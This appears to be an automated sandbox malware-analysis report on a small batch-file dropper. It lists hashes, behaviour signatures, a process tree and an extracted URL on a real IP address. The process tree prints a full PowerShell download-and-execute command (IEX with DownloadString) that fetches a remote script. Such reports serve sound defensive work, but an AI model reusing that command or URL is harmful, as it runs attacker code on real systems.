Analysis
  max time kernel:  114s
  max time network: 109s
  platform:         windows10_x64
  resource:         win10v200217
  submitted:        17-03-2020 21:10
Static task
  static1

Behavioral task
  behavioral1
    Sample:     sGfuLFJL.bat
    Resource:   win7v200217 (windows7_x64)
    Signatures: 0
    Runtime:    0 seconds

Behavioral task
  behavioral2
    Sample:     sGfuLFJL.bat
    Resource:   win10v200217 (windows10_x64)
    Signatures: 0
    Runtime:    0 seconds
General
  Target: sGfuLFJL.bat
  Size:   193B
  MD5:    17c9f036750c9f73392ad5d300c77ef7
  SHA1:   e7f99574e7989564a222e10856daded5d49d5922
  SHA256: ca270555bc105598de38c9103f8dd41470b6ea4ae35d5da3cfb75c27a7897204
  SHA512: e5036da198a282c2ebdf7e0646d5aeeab5e28d20d7266b2cc7309569ab6770258a2f846a5f4470a03d07b63d16d3a0762f860aef106759ecf6be604e3df59d46
  Score:  10/10
Malware Config
  Extracted
    Language: ps1
    Source:   ps1.dropper
    URLs:     http://185.103.242.78/pastes/sGfuLFJL
Signatures

Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    3820  4020        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                pid   process
    Token: SeRestorePrivilege  3820  WerFault.exe
    Token: SeBackupPrivilege   3820  WerFault.exe
    Token: SeDebugPrivilege    3820  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid   process
    3820  WerFault.exe  (14 identical entries, one per IoC)
Processes

1. C:\Windows\system32\cmd.exe (PID 4000)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sGfuLFJL.bat"

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4020)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/sGfuLFJL');Invoke-XQXAUMNJQV;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe (PID 3820)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 704
         Signatures:
           - Program crash
           - Suspicious use of AdjustPrivilegeToken
           - Suspicious behavior: EnumeratesProcesses